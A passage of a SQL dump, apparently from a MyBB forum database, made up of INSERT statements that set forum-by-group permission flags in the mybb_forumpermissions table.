'0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('825', '43', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('826', '43', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('454', '44', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('455', '44', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('456', '44', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('457', '44', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('458', '44', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('463', '45', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('464', '45', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('465', '45', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('466', '45', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('467', '45', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('682', '48', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('683', '48', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('684', '48', '3', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('685', '48', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('686', '48', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('687', '48', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('688', '48', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('170', '49', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('983', '50', '2', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('987', '50', '9', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('984', '50', '5', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('986', '50', '8', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('988', '50', '10', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('603', '5', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('187', '2', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('535', '2', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('631', '19', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('190', '28', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('191', '29', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('192', '39', '12', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('847', '30', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('441', '31', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('459', '44', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('468', '45', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('689', '48', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('989', '50', '12', '0', '0', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('205', '54', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('206', '54', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('207', '54', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('208', '54', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('209', '54', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('210', '54', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('985', '50', '6', '1', '1', '0', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('219', '59', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('604', '5', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('221', '2', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('607', '5', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('632', '19', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('224', '28', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('225', '29', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('226', '39', '13', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('848', '30', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('442', '31', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('460', '44', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('469', '45', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('690', '48', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('990', '50', '13', '0', '0', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('233', '54', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('335', '60', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('336', '60', '2', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO mybb_forumpermissions VALUES('337', '60', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('338', '60', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('339', '60', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('340', '60', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('341', '60', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('342', '60', '12', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('343', '60', '13', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('501', '61', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('502', '61', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('503', '61', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('504', '61', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('505', '61', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('506', '61', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '0'); INSERT INTO mybb_forumpermissions VALUES('507', '61', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('508', '61', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO mybb_forumpermissions VALUES('509', '61', '13', '1', '1', '0', '1', '1', '1', '0', '0', '1', '0', '0', '0', '1', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('271', '62', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('272', '62', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('273', '62', '3', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('274', '62', '5', '1', '0', '1', '0', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('275', '62', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('276', '62', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('277', '62', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('278', '62', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('279', '62', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('280', '62', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('982', '50', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('605', '5', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('292', '2', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('827', '43', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('633', '19', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('295', '28', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('296', '29', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('297', '39', '15', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('849', '30', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('443', '31', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('461', '44', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('470', '45', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('691', '48', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('991', '50', '15', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('304', '54', '15', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('344', '60', '15', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO mybb_forumpermissions VALUES('510', '61', '15', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('307', '62', '15', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('311', '46', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('312', '46', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('830', '16', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('816', '64', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('817', '64', '8', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('818', '64', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('819', '64', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('820', '64', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('821', '64', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('371', '66', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('372', '66', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('373', '66', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('374', '66', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('375', '66', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('376', '66', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('377', '66', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('378', '66', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('379', '66', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('380', '66', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('606', '5', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('692', '48', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('634', '19', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('992', '50', '17', '0', '0', '1', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('635', '19', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('444', '31', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('462', '44', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('471', '45', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('822', '64', '17', '0', '0', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('511', '61', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('538', '29', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('539', '39', '18', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('540', '30', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('541', '31', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('542', '44', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('543', '45', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('693', '48', '18', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('706', '50', '18', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('546', '54', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('547', '60', '18', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO mybb_forumpermissions VALUES('548', '61', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('549', '62', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('646', '64', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('551', '66', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('552', '78', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('553', '78', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('554', '78', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('555', '78', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('556', '78', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('557', '78', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('558', '78', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('559', '78', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('560', '78', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('561', '78', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('562', '78', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('563', '78', '18', '1', '1', '0', '1', '1', '1', '0', '0', '1', '0', '0', '0', '1', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('564', '79', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('565', '79', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('566', '79', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('567', '79', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('568', '79', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('569', '79', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('570', '79', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('571', '79', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('572', '79', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('573', '79', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('574', '80', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('575', '80', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('576', '80', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('577', '80', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('578', '80', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('579', '80', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('580', '80', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('581', '80', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('582', '80', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('583', '80', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('708', '81', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('709', '81', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('710', '81', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('711', '81', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('712', '81', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('713', '81', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('714', '81', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('715', '81', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('716', '81', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('717', '81', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('718', '81', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('719', '81', '18', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('608', '5', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('621', '48', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('636', '19', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('647', '64', '19', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '1', '1', '0', '1', '1'); INSERT INTO 